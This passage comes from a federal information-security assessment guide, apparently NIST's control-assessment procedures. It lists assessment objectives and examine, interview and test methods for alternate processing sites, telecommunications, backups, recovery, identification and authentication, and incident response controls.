| CP-7(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the contingency plan identifies the primary processing site hazards; and | |
| (ii) the alternate processing site is sufficiently separated from the primary processing site so as not to be susceptible to the same hazards identified at the primary site. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; other relevant documents or records]. (M) (H) | |
| CP-7(2) | ALTERNATE PROCESSING SITE |
| Control Enhancement: | |
| The organization identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster and outlines explicit mitigation actions. | |
| CP-7(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the contingency plan identifies potential accessibility problems to the alternate processing site in the event of an area-wide disruption or disaster; and | |
| (ii) the contingency plan defines explicit mitigation actions for potential accessibility problems. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; other relevant documents or records]. (M) (H) | |
| CP-7(3) | ALTERNATE PROCESSING SITE |
| Control Enhancement: | |
| The organization develops alternate processing site agreements that contain priority-of- service provisions in accordance with the organization's availability requirements. | |
| CP-7(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if alternate processing site agreements contain priority-of-service provisions in accordance with the organization's availability requirements. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site agreements; other relevant documents or records]. (M) (H) | |
| CP-7(4) | ALTERNATE PROCESSING SITE |
| Control Enhancement: | |
| The organization fully configures the alternate processing site so that it is ready to be used as the operational site supporting a minimum required operational capability. | |
| CP-7(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the alternate processing site is configured to support the minimum required information system operational capability and is ready to use as the operational site. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate processing sites; alternate processing site; alternate processing site agreements; other relevant documents or records]. (H) | |
| Test: [SELECT FROM: Information system at the alternate processing site]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-8 | TELECOMMUNICATIONS SERVICES |
| Control: The organization identifies primary and alternate telecommunications services to support the information system and initiates necessary agreements to permit the resumption of system operations for critical mission/business functions within [Assignment: organization-defined time period] when the primary telecommunications capabilities are unavailable. | |
| Supplemental Guidance: In the event that the primary and/or alternate telecommunications services are provided by a common carrier, the organization requests Telecommunications Service Priority (TSP) for all telecommunications services used for national security emergency preparedness (see http://tsp.ncs.gov for a full explanation of the TSP program). | |
| CP-8.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies primary and alternate telecommunications services to support the information system; | |
| (ii) the organization defines in the security plan, explicitly or by reference, the time period within which resumption of information system operations must take place; and | |
| (iii) the organization initiates necessary alternate telecommunications service agreements to permit the resumption of telecommunications services for critical mission/business functions within the organization-defined time period when the primary telecommunications capabilities are unavailable. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; security plan; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H) | |
| CP-8.2 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requests Telecommunications Service Priority (TSP) for all telecommunications services used for national security emergency preparedness when the primary and/or alternate telecommunications services are provided by a common carrier. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H) | |
| CP-8(1) | TELECOMMUNICATIONS SERVICES |
| Control Enhancement: | |
| The organization develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with the organization's availability requirements. | |
| CP-8(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization develops primary and alternate telecommunications service agreements that contain priority-of-service provisions in accordance with organizational availability requirements. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H) | |
| CP-8(2) | TELECOMMUNICATIONS SERVICES |
| Control Enhancement: | |
| The organization obtains alternate telecommunications services that do not share a single point of failure with primary telecommunications services. | |
| CP-8(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization obtains alternate telecommunications services that do not share a single point of failure with primary telecommunications services. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities; telecommunications service providers]. (M) (H) | |
| CP-8(3) | TELECOMMUNICATIONS SERVICES |
| Control Enhancement: | |
| The organization obtains alternate telecommunications service providers that are sufficiently separated from primary service providers so as not to be susceptible to the same hazards. | |
| CP-8(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization obtains alternate telecommunications service that is sufficiently separated from the primary provider's telecommunications service so as not to be susceptible to the same hazards. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; alternate telecommunications service provider's site; primary telecommunications service provider's site; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities; telecommunications service providers]. (H) | |
| CP-8(4) | TELECOMMUNICATIONS SERVICES |
| Control Enhancement: | |
| The organization requires primary and alternate telecommunications service providers to have adequate contingency plans. | |
| CP-8(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization requires primary and alternate telecommunications service providers to have contingency plans deemed adequate by the organization. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing alternate telecommunications services; primary and alternate telecommunications service agreements; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and testing responsibilities; telecommunications service providers]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-9 | INFORMATION SYSTEM BACKUP |
| Control: The organization conducts backups of user-level and system-level information (including system state information) contained in the information system [Assignment: organization-defined frequency] and protects backup information at the storage location. | |
| Supplemental Guidance: The frequency of information system backups and the transfer rate of backup information to alternate storage sites (if so designated) are consistent with the organization's recovery time objectives and recovery point objectives. While integrity and availability are the primary concerns for system backup information, protecting backup information from unauthorized disclosure is also an important consideration depending on the type of information residing on the backup media and the FIPS 199 impact level. An organizational assessment of risk guides the use of encryption for backup information. The protection of system backup information while in transit is beyond the scope of this control. Related security controls: MP-4, MP-5. | |
| CP-9.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the frequency of information systems backups; | |
| (ii) the organization backs up user-level and system-level information (including system state information) in accordance with the organization-defined frequency; and | |
| (iii) the organization backs up information to alternate storage sites (if so designated) at a frequency and transfer rate consistent with the organization's recovery time objectives and recovery point objectives. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; backup storage location(s); other relevant documents or records]. (L) (M) (H) | |
| CP-9.2 | ASSESSMENT OBJECTIVE: |
| Determine if the organization protects backup information at the designated storage locations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; backup storage location(s); other relevant documents or records]. (L) (M) (H) | |
| CP-9(1) | INFORMATION SYSTEM BACKUP |
| Control Enhancement: | |
| The organization tests backup information [Assignment: organization-defined frequency] to verify media reliability and information integrity. | |
| CP-9(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the frequency of information system backup testing; | |
| (ii) the organization conducts information system backup testing in accordance with organization-defined frequency; and | |
| (iii) testing results verify backup media reliability and information integrity. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; security plan; information system backup test results; backup storage location(s); other relevant documents or records]. (M) (H) | |
| CP-9(2) | INFORMATION SYSTEM BACKUP |
| Control Enhancement: | |
| The organization selectively uses backup information in the restoration of information system functions as part of contingency plan testing. | |
| CP-9(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization uses selected backup information in the restoration of information system functions as part of contingency plan testing. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; information system backup test results; contingency plan test results; other relevant documents or records]. (H) | |
| CP-9(3) | INFORMATION SYSTEM BACKUP |
| Control Enhancement: | |
| The organization stores backup copies of the operating system and other critical information system software in a separate facility or in a fire-rated container that is not collocated with the operational software. | |
| CP-9(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization stores backup copies of operating system and other critical information system software in a separate facility or in a fire-rated container that is not collocated with the operational software. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; backup storage location(s); other relevant documents or records]. (H) | |
| CP-9(4) | INFORMATION SYSTEM BACKUP |
| Control Enhancement: | |
| The organization protects system backup information from unauthorized modification. | |
| Enhancement Supplemental Guidance: The organization employs appropriate mechanisms (e.g., digital signatures, cryptographic hashes) to protect the integrity of information system backups. Protecting the confidentiality of system backup information is beyond the scope of this control. Related security controls: MP-4, MP-5. | |
| CP-9(4).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs appropriate mechanisms to protect the integrity of information system backup information. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system backup; information system design documentation; backup storage location(s); information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system backup responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| CP-10 | INFORMATION SYSTEM RECOVERY AND RECONSTITUTION |
| Control: The organization employs mechanisms with supporting procedures to allow the information system to be recovered and reconstituted to a known secure state after a disruption or failure. | |
| Supplemental Guidance: Information system recovery and reconstitution to a known secure state means that all system parameters (either default or organization-established) are set to secure values, security-critical patches are reinstalled, security-related configuration settings are reestablished, system documentation and operating procedures are available, application and system software is reinstalled and configured with secure settings, information from the most recent, known secure backups is loaded, and the system is fully tested. | |
| CP-10.1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization provides and applies mechanisms and procedures for recovery and reconstitution of the information system to known secure state after disruption or failure. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system recovery and reconstitution; information system configuration settings and associated documentation; information system design documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing information system recovery and reconstitution operations]. (M) (H) | |
| CP-10(1) | INFORMATION SYSTEM RECOVERY AND RECONSTITUTION |
| Control Enhancement: | |
| The organization includes a full recovery and reconstitution of the information system as part of contingency plan testing. | |
| CP-10(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization includes a full recovery and reconstitution of the information system as part of contingency plan testing. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing information system recovery and reconstitution; contingency plan test procedures; contingency plan test results; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with information system recovery and reconstitution responsibilities; organizational personnel with contingency testing responsibilities]. (H) |
FAMILY:
Identification and Authentication
| ASSESSMENT PROCEDURE | |
| IA-1 | IDENTIFICATION AND AUTHENTICATION POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, identification and authentication policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the identification and authentication policy and associated identification and authentication controls. | |
| Supplemental Guidance: The identification and authentication policy and procedures are consistent with: (i) FIPS 201 and Special Publications 800-73, 800-76, and 800-78; and (ii) other applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The identification and authentication policy can be included as part of the general information security policy for the organization. Identification and authentication procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. NIST Special Publication 800-63 provides guidance on remote electronic authentication. | |
| IA-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents identification and authentication policy and procedures; | |
| (ii) the organization disseminates identification and authentication policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review identification and authentication policy and procedures; and | |
| (iv) the organization updates identification and authentication policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with identification and authentication responsibilities]. (H) | |
| IA-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the identification and authentication policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the identification and authentication policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the identification and authentication procedures address all areas identified in the identification and authentication policy and address achieving policy-compliant implementations of all associated identification and authentication controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with identification and authentication responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| IA-2 | USER IDENTIFICATION AND AUTHENTICATION |
| Control: The information system uniquely identifies and authenticates users (or processes acting on behalf of users). | |
| Supplemental Guidance: Users are uniquely identified and authenticated for all accesses other than those accesses explicitly identified and documented by the organization in accordance security control AC-14. Authentication of user identities is accomplished through the use of passwords, tokens, biometrics, or in the case of multifactor authentication, some combination thereof. NIST Special Publication 800-63 provides guidance on remote electronic authentication including strength of authentication mechanisms. For purposes of this control, the guidance provided in Special Publication 800-63 is applied to both local and remote access to information systems. Remote access is any access to an organizational information system by a user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet). Local access is any access to an organizational information system by a user (or an information system) communicating through an internal organization- controlled network (e.g., local area network) or directly to a device without the use of a network. Unless a more stringent control enhancement is specified, authentication for both local and remote information system access is NIST Special Publication 800-63 level 1 compliant. FIPS 201 and Special Publications 800-73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors. In addition to identifying and authenticating users at the information system level (i.e., at system logon), identification and authentication mechanisms are employed at the application level, when necessary, to provide increased information security for the organization. | |
| In accordance with OMB policy and E-Authentication E-Government initiative, authentication of public users accessing federal information systems may also be required to protect nonpublic or privacy-related information. The e-authentication risk assessment conducted in accordance with OMB Memorandum 04-04 is used in determining the NIST Special Publication 800-63 compliance requirements for such accesses with regard to the IA-2 control and its enhancements. Scalability, practicality, and security issues are simultaneously considered in balancing the need to ensure ease of use for public access to such information and information systems with the need to protect organizational operations, organizational assets, and individuals. Related security controls: AC-14, AC- 17. | |
| IA-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the information system uniquely identifies and authenticates users (or processes acting on behalf of users); and | |
| (ii) authentication levels for users (or processes acting on behalf of users) are consistent with NIST Special Publication 800-63 and e-authentication risk assessment results. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; information system design documentation; e-authentication risk assessment results; information system configuration settings and associated documentation; information system audit records; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing identification and authentication capability for the information system]. (M) (H) | |
| IA-2(1) | USER IDENTIFICATION AND AUTHENTICATION |
| Control Enhancement: | |
| The information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 [Selection: organization-defined level 3, level 3 using a hardware authentication device, or level 4] compliant. | |
| IA-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the NIST Special Publication 800-63 authentication levels for the information system; and | |
| (ii) the information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 compliant in accordance with the organizational selection of level 3, level 3 using a hardware authentication device, or level 4. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (M) | |
| IA-2(2) | USER IDENTIFICATION AND AUTHENTICATION |
| Control Enhancement: | |
| The information system employs multifactor authentication for local system access that is NIST Special Publication 800-63 [Selection: organization-defined level 3 or level 4] compliant. | |
| IA-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, the NIST Special Publication 800-63 authentication levels for the information system; and | |
| (ii) the information system employs multifactor authentication for local system access that is NIST Special Publication 800-63 compliant in accordance with the organizational selection of level 3 or level 4. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; security plan; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) | |
| IA-2(3) | USER IDENTIFICATION AND AUTHENTICATION |
| Control Enhancement: | |
| The information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 level 4 compliant. | |
| IA-2(3).1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the NIST Special Publication 800-63 authentication levels for the information system; and | |
| (ii) the information system employs multifactor authentication for remote system access that is NIST Special Publication 800-63 level 4 compliant. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; NIST Special Publication 800-63; procedures addressing user identification and authentication; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H) |
| ASSESSMENT PROCEDURE | |
| IA-3 | DEVICE IDENTIFICATION AND AUTHENTICATION |
| Control: The information system identifies and authenticates specific devices before establishing a connection. | |
| Supplemental Guidance: The information system typically uses either shared known information (e.g., Media Access Control (MAC) or Transmission Control Protocol/Internet Protocol (TCP/IP) addresses) or an organizational authentication solution (e.g., IEEE 802.1x and Extensible Authentication Protocol (EAP) or a Radius server with EAP-Transport Layer Security (TLS) authentication) to identify and authenticate devices on local and/or wide area networks. The required strength of the device authentication mechanism is determined by the FIPS 199 security categorization of the information system with higher impact levels requiring stronger authentication. | |
| IA-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines the devices for which identification and authentication is required before establishing connections to the information system; | |
| (ii) the information system uniquely identifies and authenticates the devices defined by the organization before establishing connections to the information system; and | |
| (iii) the information system employs device authentication mechanisms with strength of mechanism determined by the FIPS 199 security categorization of the information system. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; procedures addressing device identification and authentication; information system design documentation; device connection reports; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing device identification and authentication]. (H) |
| ASSESSMENT PROCEDURE | |
| IA-4 | IDENTIFIER MANAGEMENT |
| Control: The organization manages user identifiers by: (i) uniquely identifying each user; (ii) verifying the identity of each user; (iii) receiving authorization to issue a user identifier from an appropriate organization official; (iv) issuing the user identifier to the intended party; (v) disabling the user identifier after [Assignment: organization-defined time period] of inactivity; and (vi) archiving user identifiers. | |
| Supplemental Guidance: Identifier management is not applicable to shared information system accounts (e.g., guest and anonymous accounts). FIPS 201 and Special Publications 800-73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors. | |
| IA-4.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization manages user identifiers by uniquely identifying each user; | |
| (ii) the organization manages user identifiers by verifying the identity of each user; | |
| (iii) the organization manages user identifiers by receiving authorization to issue a user identifier from an appropriate organization official; | |
| (iv) the organization manages user identifiers by issuing the identifier to the intended party; | |
| (v) the organization defines in the security plan, explicitly or by reference, the time period of inactivity after which a user identifier is to be disabled; | |
| (vi) the organization manages user identifiers by disabling the identifier after the organization-defined time period of inactivity; and | |
| (vii) the organization manages user identifiers by archiving identifiers. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; procedures addressing identifier management; security plan; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; other relevant documents or records]. (L) (M) (H) |
| ASSESSMENT PROCEDURE | |
| IA-5 | AUTHENTICATOR MANAGEMENT |
| Control: The organization manages information system authenticators by: (i) defining initial authenticator content; (ii) establishing administrative procedures for initial authenticator distribution, for lost/compromised, or damaged authenticators, and for revoking authenticators; (iii) changing default authenticators upon information system installation; and (iv) changing/refreshing authenticators periodically. | |
| Supplemental Guidance: Information system authenticators include, for example, tokens, PKI certificates, biometrics, passwords, and key cards. Users take reasonable measures to safeguard authenticators including maintaining possession of their individual authenticators, not loaning or sharing authenticators with others, and reporting lost or compromised authenticators immediately. For password-based authentication, the information system: (i) protects passwords from unauthorized disclosure and modification when stored and transmitted; (ii) prohibits passwords from being displayed when entered; (iii) enforces password minimum and maximum lifetime restrictions; and (iv) prohibits password reuse for a specified number of generations. For PKI-based authentication, the information system: (i) validates certificates by constructing a certification path to an accepted trust anchor; (ii) establishes user control of the corresponding private key; and (iii) maps the authenticated identity to the user account. In accordance with OMB policy and related E-authentication initiatives, authentication of public users accessing federal information systems (and associated authenticator management) may also be required to protect nonpublic or privacy-related information. FIPS 201 and Special Publications 800- 73, 800-76, and 800-78 specify a personal identity verification (PIV) credential for use in the unique identification and authentication of federal employees and contractors. NIST Special Publication 800-63 provides guidance on remote electronic authentication. | |
| IA-5.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization manages information system authenticators by defining initial authenticator content; | |
| (ii) the organization manages information system authenticators by establishing administrative procedures for initial authenticator distribution, for lost/compromised, or damaged authenticators, and for revoking authenticators; | |
| (iii) the organization manages information system authenticators by changing default authenticators upon information system installation; and | |
| (iv) the organization manages information system authenticators by changing/refreshing authenticators periodically. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; procedures addressing authenticator management; information system design documentation; information system configuration settings and associated documentation; list of information system accounts; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with responsibilities for determining initial authenticator content]. (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing authenticator management functions]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| IA-6 | AUTHENTICATOR FEEDBACK |
| Control: The information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals. | |
| Supplemental Guidance: The feedback from the information system does not provide information that would allow an unauthorized user to compromise the authentication mechanism. Displaying asterisks when a user types in a password is an example of obscuring feedback of authentication information. | |
| IA-6.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; procedures addressing authenticator feedback; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing authenticator feedback]. (M) (H) |
| ASSESSMENT PROCEDURE | |
| IA-7 | CRYPTOGRAPHIC MODULE AUTHENTICATION |
| Control: The information system employs authentication methods that meet the requirements of applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module. | |
| Supplemental Guidance: The applicable federal standard for authentication to a cryptographic module is FIPS 140-2 (as amended). Validation certificates issued by the NIST Cryptographic Module Validation Program (including FIPS 140-1, FIPS 140-2, and future amendments) remain in effect, and the modules remain available for continued use and purchase until a validation certificate is specifically revoked. Additional information on the use of validated cryptography is available at http://csrc.nist.gov/cryptval. | |
| IA-7.1 | ASSESSMENT OBJECTIVE: |
| Determine if the information system employs authentication methods that meet the requirements of applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module (for non-national security systems, the cryptographic requirements are defined by FIPS 140-2, as amended). | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Identification and authentication policy; FIPS 140-2 (as amended); procedures addressing cryptographic module authentication; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H) | |
| Test: [SELECT FROM: Automated mechanisms implementing cryptographic module authentication]. (M) (H) |
FAMILY:
Incident Response
| ASSESSMENT PROCEDURE | |
| IR-1 | INCIDENT RESPONSE POLICY AND PROCEDURES |
| Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, incident response policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the incident response policy and associated incident response controls. | |
| Supplemental Guidance: The incident response policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The incident response policy can be included as part of the general information security policy for the organization. Incident response procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. NIST Special Publication 800-61 provides guidance on incident handling and reporting. NIST Special Publication 800-83 provides guidance on malware incident handling and prevention. | |
| IR-1.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization develops and documents incident response policy and procedures; | |
| (ii) the organization disseminates incident response policy and procedures to appropriate elements within the organization; | |
| (iii) responsible parties within the organization periodically review incident response policy and procedures; and | |
| (iv) the organization updates incident response policy and procedures when organizational review indicates updates are required. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response responsibilities]. (H) | |
| IR-1.2 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the incident response policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance; | |
| (ii) the incident response policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and | |
| (iii) the incident response procedures address all areas identified in the incident response policy and address achieving policy-compliant implementations of all associated incident response controls. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy and procedures; other relevant documents or records]. (L) (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response responsibilities]. (H) |
| ASSESSMENT PROCEDURE | |
| IR-2 | INCIDENT RESPONSE TRAINING |
| Control: The organization trains personnel in their incident response roles and responsibilities with respect to the information system and provides refresher training [Assignment: organization-defined frequency, at least annually]. | |
| Supplemental Guidance: None. | |
| IR-2.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization identifies and documents personnel with incident response roles and responsibilities; | |
| (ii) the organization provides incident response training to personnel with incident response roles and responsibilities; | |
| (iii) incident response training material addresses the procedures and activities necessary to fulfill identified organizational incident response roles and responsibilities; | |
| (iv) the organization defines in the security plan, explicitly or by reference, the frequency of refresher incident response training and the frequency is at least annually; and | |
| (v) the organization provides refresher incident response training in accordance with organization-defined frequency. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; security plan; incident response training records; other relevant documents or records]. (M) (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities]. (M) (H) | |
| IR-2(1) | INCIDENT RESPONSE TRAINING |
| Control Enhancement: | |
| The organization incorporates simulated events into incident response training to facilitate effective response by personnel in crisis situations. | |
| IR-2(1).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization incorporates simulated events into incident response training to facilitate effective response by personnel in crisis situations. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; other relevant documents or records]. (H) | |
| Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities]. (H) | |
| IR-2(2) | INCIDENT RESPONSE TRAINING |
| Control Enhancement: | |
| The organization employs automated mechanisms to provide a more thorough and realistic training environment. | |
| IR-2(2).1 | ASSESSMENT OBJECTIVE: |
| Determine if the organization employs automated incident response training mechanisms to provide a more thorough and realistic training environment. | |
| POTENTIAL ASSESSMENT METHODS AND OBJECTS: | |
| Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; automated mechanisms supporting incident response training; other relevant documents or records]. | |
| Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities]. |
| ASSESSMENT PROCEDURE | |
| IR-3 | INCIDENT RESPONSE TESTING AND EXERCISES |
| Control: The organization tests and/or exercises the incident response capability for the information system [Assignment: organization-defined frequency, at least annually] using [Assignment: organization-defined tests and/or exercises] to determine the incident response effectiveness and documents the results. | |
| Supplemental Guidance: NIST Special Publication 800-84 provides guidance on test, training, and exercise programs for information technology plans and capabilities. | |
| IR-3.1 | ASSESSMENT OBJECTIVE: |
| Determine if: | |
| (i) the organization defines in the security plan, explicitly or by reference, incident response tests/exercises; | |
